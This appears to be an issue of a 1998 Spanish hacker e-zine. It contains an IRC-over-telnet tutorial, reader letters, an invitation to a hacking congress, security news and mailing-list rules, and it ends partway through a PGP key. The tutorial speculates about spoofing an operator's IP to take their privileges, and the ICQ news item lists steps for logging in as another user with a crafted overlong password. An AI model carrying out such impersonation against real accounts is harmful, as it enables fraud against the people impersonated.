:fenix.irc-hispano.org 252 pep_1 7 :operator(s) online
:fenix.irc-hispano.org 253 pep_1 6 :unknown connection(s)
:fenix.irc-hispano.org 254 pep_1 1185 :channels formed
:fenix.irc-hispano.org 255 pep_1 :I have 359 clients and 1 servers
:fenix.irc-hispano.org NOTICE pep_1 :Highest connection count: 690 (689 clients)
:fenix.irc-hispano.org 375 pep_1 :- fenix.irc-hispano.org Message of the Day
:fenix.irc-hispano.org 372 pep_1 :- 14/10/1997 12:21
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- Bienvenidos al servidor de IRC de Arrakis
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- -----------------------------------------
.
.
Aqui siguen muchas lineas de bienvenida..
.
.
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- Esta es la politica de este servidor:
:fenix.irc-hispano.org 372 pep_1 :- puertos 6665, 6666, 6667, 6668 y 6669.
:fenix.irc-hispano.org 372 pep_1 :- Por favor repartiros por estos puertos, :fenix.irc-hispano.org 372 pep_1 :- con ello. Gracias.
:fenix.irc-hispano.org 372 pep_1 :-
------------------------------------------
:fenix.irc-hispano.org 376 pep_1 :End of /MOTD command.
Por fin! ya estamos conectados! Con el mIRC es mas facil eh....
Ahora ya estamos conectados al IRC, solo nos falta entrar en algun canal a
ver lo que se cuece no?, pues vamos alla.
El comando para entrar es JOIN canal.
Ej:
JOIN #el_amor_universal
Una vez entramos dentro de un canal empezaremos a ver lo que se esta hablando
Ahi va otro pedazo de log como ejemplo:
join #mexicano
:pep_1!~sol@ppp136.207.redestb.es JOIN :#mexicano
:fenix.irc-hispano.org 332 pep_1 #mexicano :joroña que joroña
:fenix.irc-hispano.org 333 pep_1 #mexicano Rommel 908311068
:fenix.irc-hispano.org 353 pep_1 = #mexicano :pep_1 @senpai @ChemiX @Rommel
@Thays @Scytale
:fenix.irc-hispano.org 366 pep_1 #mexicano :End of /NAMES list.
:Scytale!Scytale@theilax.arrakis.es NOTICE pep_1 :Bienvenido a #mexicano. El dia 3 este canal estara cerrado con motivo de la huelga de Internet. Secundala! Joroña que Joroña!
:Rommel!Granuja@ppp194.197.redestb.es PRIVMSG #mexicano :yo no lo hubiera dich
o mejor....
:Thays!yo@194.224.193.186 PRIVMSG #mexicano :que sabemos lo que se pierde
:Mendes!IRcap.49@195.53.104.197 JOIN :#mexicano
:Mendes!IRcap.49@195.53.104.197 NICK :Mefisto
En este log puedes ver que cuando te unes a un canal te sale una lista con
la gente que hay en el canal, y te envian el NOTICE del canal.
Tambien se puede ver al final como entra un nuevo usuario (Mendes) al canal.
Mas cosas....
Ya nos hemos conectado al servidor IRC y estamos dentro de un canal, y
ahora el paso logico es chatear!.
El comando para enviar mensajes es PRIVMSG
PRIVMSG destino1,destino2,.. Mensaje
En destino puedes poner un nick o un canal o una lista de ellos.
El mensaje ha de ir precedido por los dos puntos (:)
Ej:
PRIVMSG pepe :Hola pepe me recibes?
PRIVMSG #amor :Busco chica para relacion formal...
Creo que se pilla el concepto no?
Bueno voy a dejarme de chateo y voy a ver que hay por ahi...
Prueba a darle al comando HELP, te saldra algo como:
help
:fenix.irc-hispano.org NOTICE pep_1 :PRIVMSG
:fenix.irc-hispano.org NOTICE pep_1 :NICK
:fenix.irc-hispano.org NOTICE pep_1 :NOTICE
:fenix.irc-hispano.org NOTICE pep_1 :JOIN
:fenix.irc-hispano.org NOTICE pep_1 :MODE
:fenix.irc-hispano.org NOTICE pep_1 :QUIT
:fenix.irc-hispano.org NOTICE pep_1 :PART
:fenix.irc-hispano.org NOTICE pep_1 :TOPIC
.
.
Un monton de comandos mas.....
.
.
:fenix.irc-hispano.org NOTICE pep_1 :INVITE
:fenix.irc-hispano.org NOTICE pep_1 :KICK
:fenix.irc-hispano.org NOTICE pep_1 :WALLOPS
:fenix.irc-hispano.org NOTICE pep_1 :PING
:fenix.irc-hispano.org NOTICE pep_1 :PONG
:fenix.irc-hispano.org NOTICE pep_1 :SILENCE
:fenix.irc-hispano.org NOTICE pep_1 :GLINE
:fenix.irc-hispano.org NOTICE pep_1 :NOTE
:fenix.irc-hispano.org NOTICE pep_1 :SERVICE
:fenix.irc-hispano.org NOTICE pep_1 :HASH
:fenix.irc-hispano.org NOTICE pep_1 :DNS
:fenix.irc-hispano.org NOTICE pep_1 :REHASH
:fenix.irc-hispano.org NOTICE pep_1 :RESTART
:fenix.irc-hispano.org NOTICE pep_1 :DIE
Estos son los comandos que tiene implementados el servidor de IRC.
Si has leido hasta aki te preguntaras, y para que quiero yo conectarme al
IRC con el telnet??? Si con mi cliente me complico menos la vida!
Pues para aprender, solo eso. Ademas si algun dia te interesa programar un
cliente para IRC, necesitaras saber como funciona no?
Ademas, si echamos a volar un poco la imaginacion... si tenemos la IP de un
operador, y enviaramos paquetes con ordenes con la ip del operador.. no
tendriamos sus privilegios? podriamos ser operadores en todos los canales...
incluso podriamos ser IrCops haciendonos pasar por ellos falseando nuestra
ip, no?
Pero esto plantea nuevos problemas... hay que averiguar desde que puertos se
conecta el operador, el servidor que usa, los numeros de secuencia de los
paquetes tal vez?
Esto os lo dejo a vuestra imaginacion.
Hay muchisimos mas comandos en IRC, pero con esto que he contado tienes
suficiente para empezar a experimentar.
Si a alguien le interesa el tema hare una segunda entrega con explicacion a
mas comandos y un pokito mas del tema del spoofing en irc, asi que mandadme
mails si os interesa todo esto.
Tengo que agradecer a jcl que me despertara el interes sobre el tema del IRC
que era algo que tenia completamente apagado...
Si os interesa el tema mi email es: senpai@cyberdude.com ahi podeis enviar
vuestras sugerencias y criticas a mi articulo (esta hecho en un tiempo record
de 30 minutos asi que seguro que tiene fallos).
Para profundizar mas sobre el tema os recomiendo que os leais la RFC 1459.
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
*/*\/*\/*\/*\/*\/*\/*\*
/ \
*|* CARTAS DEL LECTOR *|*
*|* ----------------- *|*
\ /
*\*/\*/\*/\*/\*/\*/\*/*
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A parte de felicitarles por su revista, y decirles ke se den un paseito
por el web de abajo del todo (si el ke pone Necronomicon...), y se miren
la Guia de Temas Olvidados y se meten a A¤adir un Enlace y me rellenen
el formulario, porke me gustaria ponerles un link en esa seccion dentro
de Red, pero no se ke descripcion ponerles. Asi ke solo dense una vuelta
me envian el formulario y chapooo...
Pasando al tema ke keria comunicarles... Seguro ke no conocian la
existencia de la Red de IRC Union Latina, pero fijo ke si conocian el
IRC-Hispano. Pues nada pasarles los servers de la Red de IRC Union
Latina:
Union Latina: Comunet (ES, Bilbao): comunet.unionlatina.org
Union Latina: Digital (ES, Madrid): madrid.unionlatina.org
Union Latina: Dragonet (ES, Alicante): dragonet.unionlatina.org
Union Latina: Interlink (ES, Madrid): interlink.unionlatina.org
Union Latina: Lander (ES, Madrid): lander.unionlatina.org
Union Latina: Telebase (ES, Alicante): telebase.unionlatina.org
Union Latina: Tinet (ES, Tarragona): tinet.unionlatina.org
Su web oficial es:
http://www.unionlatina.org
Y el Bot de esta Red es KaOs. Ke porke les interesaria esta red????...
pueee. porke es una red alternativa al IRC-Hispano y no hay IRCops
fascista como en la otra... Aunke es una pena antes habia un server de
Mexico y otro de Puerto Rico, pero se han caido y no creo ke vuelvan...
Por cierto si conocen por alla el otro lado del charco, algun server ke
pudiera unirse a Union Latina comunikenmelo ke yo se lo digo a un par de
IRCops... Siguiendo con el tema... pues ke keremos ke esta sea la red
donde hablen todos los hispanos del mundo... asi ke ya saben a darse
una vuelta por la red...
Pueee nada maxxxx... espero ke si pueden lo comuniken en su e-zine, pa
ke la gente sepa ke hay otras redes Hispanas aparte del IRC-Hispano...
Ale... ke sigan tan bien con su e-zine... y ke no decaigan...
Mushas GraciaX por todo... se despide un espa¤olito de ustedes...
[ Tomad nota todos los IRCmaniacos ... seguro que la red latina esta
genial ... no lo olvideis ... ]
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
amigos de RareGazz :
HIzes desde ARGENTINA
La presente es para solicitar autorizacion para difundir su fantastica
revista en mi web ------> members.xoom.com/rifoxxx
Esta de mas decir q es una de las mejores del MUNDO y que he aprendido
mucho con ella
[ Pues claro!!!! Todo el que quiera tener nuestro e-zine en su web que nos
mande un mail indicandonos la ruta exacta de donde esta cada numero y lo
publicaremos como mirror en nuestra seccion de magazines ]
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
UnderCon II
Octubre de 1998 Murcia/Espa¤a
-Invitacion-
Fecha:
------
Primer fin de semana de Octubre. Viernes 2, Sabado 3 y Domingo 4.
Lugar:
------
Murcia capital. Punto de contacto CyberCafe Java.
La forma de llegar es muy sencilla tanto en coche, autobus, tren e incluso
avion.
Condiciones:
------------
- Cada grupo invitado contara con una persona de contacto que se encargara
de enviarle la invitacion, solucionarle dudas, y guiarle por la ciudad.
- Para mantener un nivel aceptable de asistencia, solo se permitira la entrada
de personas invitadas y acompa¤antes. (Identificados mediante la tarjeta
que tendreis que imprimir y rellenar, y que os sera enviada junto a esta
correo)
- No tenemos previsto cobrar entrada, salvo si es necesario cubrir los pocos
costes que el evento pueda originar.
- Comida y alojamiento son de libre eleccion, la organizacion aportara un
local en el que se pueda dormir (Con sacos de acampada) y recomendara
restaurantes donde comer, aunque se podra libremente optar por otras
alternativas.
- No se tiene previsto disponer de sitio para colocar ordenadores, aunque
los equipos portatiles seran bienvenidos.
- Disponer de un telefono movil sera recomendable a la hora de mantener el
contacto.
Contenido:
----------
- Los dos temas centrales del congreso seran el phreaking y el hacking,
aunque tambien se trataran temas como programacion de virus, ingenieria
inversa, carding, etc...
- Se impartiran una serie de conferencias, tanto por oradores locales como
por cualquier invitado que se sienta capaz.
- Se organizaran los habituales debates y tertulias, donde conocer a la
gente. Este a¤o intentaremos dividir a la gente en grupos para evitar la
masificacion de oradores.
- Tal vez si el tiempo lo permite se organice algun concurso, trivial-hack,
lanzamiento de moviles, etc...
- El sabado noche se organizara un ruta turistica por los garitos de la
ciudad.
Conferencias:
-------------
-Introduccion a las redes X25 por Dark Raver
-Seguridad en comunicaciones inalambricas por CPNE
-DNS spoofing Fatuo & Dark Raver
-Chaping por TDD
-Contratacion de un numero 900s en Espa¤a por Fatuo & Warezzman
-Cualquier otra que los invitados esten dispuestos a dar.
Grupos Asistentes:
------------------
-RareGaZz :)
-CPNE
-KTD
-TDD
-Hispahack
-Com30
-NPT
-Vieja Guardia
-29A
-etc...
Consultas:
----------
Es muy recomendable confirmar la asistencia con antelacion. Asi que incluso
aunque no tengais dudas, seria muy importante que escribais un peque¤o
mensaje a la siguiente direccion: informacion.undercon98@usa.net
Es tambien muy importante que contacteis con vuestra persona de contacto
para solucionar todos los detalles de vuestra asistencia.
Esta invitacion puede ser distribuida entre todos aquellos posbiles
interesados en el tema, siempre que sean de vuestra confianza y pudean
aportar su experiencia al evento.
Recomendamos maxima discrecion a la hora de comentar este tema.
Mas detalles os seran dados en un mensaje de vuestra persona de contacto,
en el que tambien recibireis el gif de la tarjeta de identificacion que
necesitareis imprimir y rellenar, y que hara las veces de invitacion.
Saludos
[ Pues si alguno quiere ir que me envie un mail a guybrush@cyberdude.com
para que le de la invitacion correspondiente. Yo fui el a¤o pasado y este
voy a repetir ... no os lo podeis perder!! ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-_-=-_-=-_-=-_-=
| |
| NOTILOONZ |
| --------- |
| _ _ _ _ |
=- -=- -=- -=- -=
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Novedades en el caso Vesatec
----------------------------
El caso mas reciente y bochornoso contra la libertad de expresion en
Internet da un paso importante hacia adelante... la sede central de la
BaSurA (BSA), ha decidido cerrar la sucursal de Barcelona, prescindiendo
de su colaborador el Sr. X. Ribas, hasta ahora conocido como el Abogado
Anti-Pirateria... jejjejejej, como se le conocera ahora?
Las malas lenguas dicen que desde que se incorporo el nuevo director de
Microsoft Espa¤a (recordemos que la mayor parte de la BSA, pertenece a
esta empresa), las cosas han cambiado mucho, y supongo que al revisar
nuestro caso, informaron a cierta persona en Redmond, que no le haria
mucha gracia, coincidiendo con su visita a Lisboa (el mismo dia que yo
cumplo a¤o, el 9/9) y su posible visita a Espa¤ a posterior, pues han
decidido limpiar un poco en casa.
Por cierto segun fuentes de toda solvencia, el caso Vesatec, aparte de
otro de similares caracteristicas ocurrido en Italia en fechas antes de lo
nuestro (y que por cierto se resolvio a favor de los acusados), es uno de
los mas importantes de Europa, y esta en la mira de buffettes abogaciles
muy prestigiosos.
Teneis toda la informacion del suceso en http://bsatec.org
Salu2
Angeloso
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ampliarian el caso judicial de microsoft
----------------------------------------
El Departamento de Justicia de los Estados Unidos y los 20 estados
norteamericanos que estan demandando a Microsoft planean aumentar la
presion sobre la empresa de Bill Gates al incluir alegatos sobre nuevas
presuntas practicas monopslicas y da¤inas por parte del gigante del
software. Las nuevas acusaciones podrian ser presentadas hoy mismo e
incluirian evidencia que demostraria que Microsoft presiono a Intel para
que no tuviera en cuenta el software de su competidor Netscape
Communications, que manipulo su sistema operativo Windows para que no
pueda trabajar con productos de otras firmas, y que intento dividirse el
mercado del software de audio y video con Apple Computer, de acuerdo a lo
publicado por el Seattle Times. Segun estipula la ley norteamericana, el
gobierno y los estados solo pueden incluir nueva evidencia en caso de que
la misma esta relacionada con los cargos antes presentados. El juez que
entiende en la causa, ahora debera determinar si la nueva evidencia puede
ser tenida en cuenta para el juicio que comenzara el proximo 23 de
septiembre.
http://www.news.com/News/Item/0,4,25858,00.html?st.ne.4.head
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nuevo sistema para acceder a los E-Mails sin encender el PC
-----------------------------------------------------------
Un novedoso servicio de notificacion de emails original de Israel que esta
desembarcando en los Estados Unidos propone una pratica manera de chequear
el correo electronico. MailPush, como es conocido el nuevo sistema,
permite a los usuarios con cuentas de email acceder a sus mensajes a
traves de faxes, telefonos, celulares o pagers sin la necesidad de estar
en permanente contacto con sus computadoras. El sistema, que tambien
notifica a quien envia el mensaje que sus emails llegaron a destino, es
ofrecido directamente a traves de Internet por una unidad de Cellcom, la
empresa de telefonia celular mas grande de Israel. MailPush tambien planea
distribuir el servicio a traves de las empresas proveedoras de Internet
(ISP), al mismo tiempo que no descartan implementarlo en forma directa a
traves de las compa¤ias de telefono. Marc Schechtman, vicepresidente de
MailPush, manifesto que proyectan que "de aqui a un a¤o, el 5% de los
usuarios norteamericanos de Internet se suscriban al servicio", y que
planean llevarlo a otros 20 paises en un futuro cercano.
http://www.news.com/News/Item/0,4,25856,00.html?st.ne.1.head
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft recharo las acusaciones de Sun con respecto a Java
------------------------------------------------------------
A traves de un documento presentado ante la corte que interviene en el
caso el viernes pasado, Microsoft rechazo energicamente las intimacion
preliminar presentada por Sun Microsystems en su contra alegando que una
accion de ese tipo "causaria no solo un gran da¤o a Microsoft sino tambien
a sus distribuidores, revendedores, desarrolladores de software e incluso
a los propios usuarios". En el mes de mayo, Sun presento una intimacion
preliminar argumentando que el Windows 98 incluye una version de Java que
es incompatible con la desarrollada por ellos, por lo que solicita que se
obligue a Microsoft a incluir la version de Sun en el flamante sistema
operativo y que se le impida a la compa¤ia de Bill Gates distribuir el
Visual 6.0 hasta tanto no sea totalmente compatible con la version
standard del Java de Sun. En su descargo realizado el viernes, Microsoft
manifesto que no solo la empresa cumplio con la licencia sobre Java que
mantiene con Sun, sino que todos sus productos son compatibles con el
sistema en cuestion.
http://www.techweb.com/wire/story/TWB19980828S0001
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Una falla en Hotmail expuso los password de los usuarios
--------------------------------------------------------
El proveedor de mail gratuito de Microsoft admitio que esta intentando
reparar el problema originado en el servicio de correo de Hotmail, el cual
permitio que programadores malintencionados de JavaScript pudieran alterar
y vulnerar los passwords de los usuarios. El problema se detecto cuando la
empresa Specialty Installations publico una demostracion del mismo en su
site "Porque Podemos", el cual esta dedicado a los trabajos e
investigaciones no rentadas de los programadores de paginas web de la
compa¤ia canadiense. Apodado "Hot" Mail, la muestra consta de un mail que
contiene el denominado Caballo de Troya, un sistema que altera la
interface de los usuarios con Hotmail. Una vez modificada la interface,
cualquier comando que se ejecuta produce un mensaje falso por "expiracion
de tiempo", y pide que se reingrese el nombre y password. Al cumplir con
la requisitoria, el usuario retorna al site standard de Hotmail, pero el
nombre y la clave personal en ese momento llegan a las manos de los
delincuentes o, en este caso de demostracion, a Specialty Installations.
Sean Fee, ejecutivo de Hotmail, manifesto que estan trabajando
intensamente ya que "la proteccion de los mails y las cuentas de los
clientes son de vital importancia para la compa¤ia".
http://www.news.com/News/Item/0,4,25620,00.html?st.en.fd.gif.f
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug del ICQ
-----------
Un tipo Zachary Allison, ha logrado traspasarla seguridad del ICQ y
hacerse pasar por cualquier usuario. Esta persona ha echo un clon del
icq pero para linux, el zICQ, para linux, tomando las fuentes del mICQ
y modificandolas, pero este no tiene la limitacion de pass del de
Mirabilis, ya que este permite pass de mas de 8 caracteres, al contrario
que el oficial que solo permite 8, y aqui esta el fallo que permite a
un usuario suplantar a otro previo conocimiento de su UIN, si mandas un
pass de mas de 8 caracteres el buffer de los servidores falla y te da
acceso como el UIn que le digas.
Primero se debe bajar el zICQ en: http://hookah.ml.org/zicq
Usa tu programa ICQ para ver si el usuario legitimo esta conectado, si
asi es espera que se desconete.
Conecta con el zICQ, da el UIN que quiereas y el pass "123456789"
El autor dice que esto no es spoofing, que simplemente estas conectado
como el usuario seleccionado y que puedes recibir y mandar mensajes como
si fueras el.
Funcionara siempre y cuando otro UIN no se haya logueado como el UIN por
el que te vas a hacer pasar..
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug del E-Mail del Netscape y del Outlook
-----------------------------------------
Dos investigadores de la Universidad finlandesa de Oulu, Ari Takanen y
Marko Laakso, han descubierto un fallo de programacion en los programas
gestores de correo electronico de Netscape y Outlook de Microsoft, que
permitirman a intrusos informaticos con malas intenciones destruir o robar
documentos e insertar diferentes virus en nuestro ordenador. Tanto
Netscape como Microsoft han confirmado el hecho y han empezado a elaborar
contrareloj "parches" o programas que corrijan el defecto.
El defecto o "bug" se produce sin necesidad de abrir el mensaje, lo cual
ha disparado la alarma en la comunidad de Internet, pues hace revivir un
viejo fantasma que asolo la red en los primeros a¤os, cuando se penso que
la recepcion de un simple mensaje de correo electronico podria servir para
que alguien entrara en nuestro ordenador. Algunos desaprensivos se
encargaron a lo largo de los ultimos a¤os de mantener vivo el temor,
lanzando falsas ideas del tipo de "si usted abre un mensaje que lleve por
titulo "Win a holiday" o "Good times" infectara automaticamente su
maquina".
La noticia hoy es que existe la posibilidad de que simplemente recibiendo
un correo con un archivo adjunto, uno puede perder el control del propio
ordenador. Cuando el fichero adjunto lleva un nombre extremadamente largo,
con una extension superior a la que admite el sistema, el programa lector
de correo se queda "colgado". Pero antes de ello, al parecer, se ejecuta
el fichero en cuestion, que puede consistir en un virus o, por poner otro
ejemplo, en un programa para copiar el contenido del disco duro y enviarlo
por la red. Uno de los mayores expertos en seguridad en Espa¤a, Jose
Manuel Gomez, coordinador del sitio web Kriptspolis,http://kriptopolis.com
en el que se da una amplia informacion del tema, ha asegurado en su
boletin que "los usuarios estan ahora desprotegidos y, dada la
implantacion de los programas de correo, tenemos al diablo sentado en la
mesa".
Sin embargo, a pesar de la convulsion, el modo concreto de explotar este
"bug" aun no ha sido difundido. Tampoco han trascendido noticias de
ataques. Netscape ha se¤ alado que en los proximos dias difundira una
version que evite el problema, mientras Microsoft ha recomendado que no se
lean los mensajes con ficheros adjuntos de comunicantes desconocidos.
Netscape ha pedido que "bajo ninguna circunstancia se active el menu de
Archivo cuando el mensaje esta seleccionado". Ambos fabricantes de
software sugieren visitas periodicas a sus paginas dedicadas a seguridad,
pues tan pronto tengan el "antidoto" lo difundiran.
La fuerte competencia entre los navegadores ha llevado a ambas firmas
rivales a comercializar software con errores tan graves como estos, segun
coinciden diversos programadores consultados por nuestro diario. Como
fuente de informacion adicional, se recomienda News.com, asi como el foro
mas prestigioso de la red en cuestiones de "bugs" y errores de
programacion: http://www.ntbuqtraq.com,dsd.
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug del Windows 98
------------------
Aparentemente el Windows 98 tiene un bugs que funciona de la siguiente
manera. El mal llamado sistema operativo (para mi software de sistema)
parece que se resetea solo, a determinada hora de determinados dias.
Parece que entre las 23:59 Hs. y las 24:00 Hs. (0:00 Hs.) del dias 31 de
diciembre de cada a¤o, dicho software se reinicia, solo sin ningun motivo
aparente y sin previo aviso, como si se hubira pulsado la tecla Reset de
la CPU.
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
La RareDudeZz esta cerca de los 500 usuarios
--------------------------------------------
La lista de correo de RareGaZz (mas conocida por RareDudeZz) comenzo a
funcionar con la unica intencion de avisar a nuestros lectores de las
apariciones de nuevos numeros en nuestro e-zine, pero se ha convertido,
gracias a todos, en uno de los mayores foros hispanos sobre temas
underground.
Hoy dia has cerca de 500 usuarios suscritos y se recibe una media de 20
o 30 mails diarios.
El tema principal de la lista es el Hacking pero tambien se tratan otros
temas y se ayuda a la gente mas iniciada, que parece que estan algo
perdidos.
Una vez mas quiero recordar las normas de la lista, las cuales podeis
encontrar en la pagina principal de RareGaZz:
- Formas de suscribirse:
1- Rellenando el formulario de nuestra Web
2- Enviando un e- mail a raregazz@iname.com poniendo en el
subject: 'suscribe direc@de.correo' donde direc@de.correo
es vuestra direccion de e-mail ... no me seais tan burros
de poner 'direc@de.correo' ... que ya han habido varios.
3- Acceder a la pagina http://www.coollist.com y rellenar,
abajo del todo, vuestros datos de e-mail y la lista de
correo a la que os quereis suscribir; en este caso, la
'raredudez' (sin comillas).
- Formas de desuscribirse:
1- Acceder a la pagina http://www.remove.coollist.com y
rellenar vuestros datos de e-mail y la lista de correo
a la que os quereis desuscribir; en este caso, la
'raredudez' (sin comillas).
- Normas:
* Las teneis todas en la pagina principal de nuestra Web.
Leerlas antes de suscribiros porque luego hay mucha gente
que rellena el formulario y pregunta ... que hago aqui?
que es esto? porque me mandais tantos mails? Joder!!! no
sabeis leer?. Pues eso, que leais bien las normas antes
de suscribiros.
* No preguntes tonterias. No quiero decir que la dudas de la
gente iniciada sean tonterias. Al contrario, para eso
estamos!! pero las preguntas tipo: 'quiero entrar en mi
colegio para cambiarme las notas, explicarme en breve como
lo hago ... '. $%@ merecen ser dados de baja
inmediatamente.
* Puedes preguntar cosas sobre h/p/v/c, incluso dudas sobre
configuracion de Linux, pero ya esta. Tambien puedes
comentar noticias o nuevos bugs.
* Queda totalmente prohibido enviar attach en los mails (para
eso disponemos de un FTP anonimo).
- Ventajas:
* Si estas iniciandote todo son ventajas. Pero mejor primero
lee y cuando te enteres mas ya escribiras. No digas cosas
de las que luego te vayas a arrepentir :)
* Te enteraras de cuando salen nuevos numeros de nuestro
e-zine, asi como de los e-zines de nuestros compa¤eros de
SET y de JJFhackers, que estan haciendo tambien un buen
trabajo.
* Conoceras mas hackers, posiblemente de tu ciudad.
* Quedadas 'secretas' en el IRC. Solo para RareDudeZz.
* De vez en cuando hacemos estudios sobre la seguridad de
algun server. Para ver los posibles agujeros que pueda
tener.
* Disponemos de un FTP anonimo donde intercambiar programas
interesantes (no comerciales - no WareZz).
* Aunque sean muchos mails, son cortos y sin attach, por lo
que en 5 minutos los tienes todos en tu ordenador.
- Inconvenientes:
* La lista no esta moderada. Puedes recibir mails que no te
interesen (y que tendras que soportar sin insultar y sin)
meterte con nadie ... sino, seras borrado un mes de la
lista. Esto lo digo porque ya hemos tenido algun ligero
problemilla de gente muy 'guay' que piensa que algunas
preguntas son muy 'lamer' para ellos. Por desgracia hay
mucha gente asi. Te lloran para que les ense¤es cosas y
luego, cuando han aprendido 'algo', vacilan con los mas
newbies, en vez de ense¤arles. Y sino, leer el texto final
de Set 16 (extraido de un log del IRC) y ver como se creen
algunos que son 'guays' y resulta que nada mas que saben
'hablar' y banear a la gente. Se¤ores, ser elite no
consiste en conseguir 'op' en un canal de hacking de IRC.
* 20 o 30 mails diarios.
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Undercon en Monterrey????
-------------------------
Hablando sobre la RareDudeZz, se ha estado discutiendo la posibilidad
de hacer un Undercon en Monterrey, Mexico, se ve que hay mucho
entusiasmo y ganas de lograr hacerlo.
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
X-Ploit TEAM ataca de nuevo
---------------------------
El grupo mexicano de Crackers, clasificados asi por Rootshell, hizo de
nuevo de las suyas en otro de los sites del gobierno mexicano, en esta
ocasion la victima fue www.sanpedro.gob.mx, que es un municipio del
estado de Nuevo Leon.
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RaZa MeXiCaNa TEAM
------------------
Los se¤ores(as) que se reunen en un canal denominado #RaZa_MeXicaNa, de
los servidores de Red Latina del IRC han sacado el numero 1 y 2 de su
boletin de seguridad, este boletin(muy bueno por cierto) lo puedes
encontrar en:
http://www.BigFoot.com/~RaZa-Mexicana
Ä[ L l a v e s P G P ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
<<::RareGaZz::>> // raregazz@iname.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>
mQGiBDV6jbIRBADl1IELaiXIUyKxED1if1YcTV6+d/flNE97cXC+nhFbfPKQ3oaj
ybIALWB3X9LhfbSc3uD5RTrHQcUATtYXRboMCUZe+OcI7dlndCsEyR1Jx9J49Qys
JbbjrPft9eWlA8SqEtSGaV8003phw09cWxhDu0LV/ijSngPpngjo+xsNJQCg/2qo
Ukocb3rX9hNNIjVb2a8SsjcD/2L6hM75g4KGY4qk2FlDWuoHivphn+ARO0fQCkmT
28UMf3dqktGXO5mn63mky/wjrTIjZd2w0jbeXIsyGFeD+1Bk3OGjJmds7j3pH8mP
jCvmoozX4MbHo5SbXi7MF4i/PNkcudlrXXZH/HAa6hBGqo7RHChFnZhxjfpvzX4Z
4BGCA/0ZTQyjqglnSPTyMPooMsi3QZZYZUIeKAcfYB1vuaf31X3CvKYlDLYF0qj4
5n15nIhyDHh3GwwlJJrdmOwmH/Fzn90mGn9xWpxD3Ou+qmvFLpn4RvupkupZkVJg
GJAfgDn+YnaVTeKqa+HME5RMzeKvIDHJVeXPf/JPe/RQg2kc6bQdUmFyZUdhWnog
PHJhcmVnYXp6QGluYW1lLmNvbT6JAEsEEBECAAsFAjV6jbIECwMBAgAKCRDzs12Y
6YPcYhezAKDpOa+ZYL9OzHv4DsryHl+yhwyXTwCeMQoUP8IDKHYycKV3aw9YCodC
Kze5BA0ENXqNsxAQAPkYoH5aBmF6Q5CV3AVsh4bsYezNRR8O2OCjecbJ3HoLrOQ/
40aUtjBKU9d8AhZIgLUV5SmZqZ8HdNP/46HFliBOmGW42A3uEF2rthccUdhQyiJX
Qym+lehWKzh4XAvb+ExN1eOqRsz7zhfoKp0UYeOEqU/Rg4Soebbvj6dDRgjGzB13
VyQ4SuLE8OiOE2eXTpITYfbb6yUOF/32mPfIfHmwch04dfv2wXPEgxEmK0Ngw+Po
1gr9oSgmC66prrNlD6IAUwGgfNaroxIe+g8qzh90hE/K8xfzpEDp19J3tkItAjbB
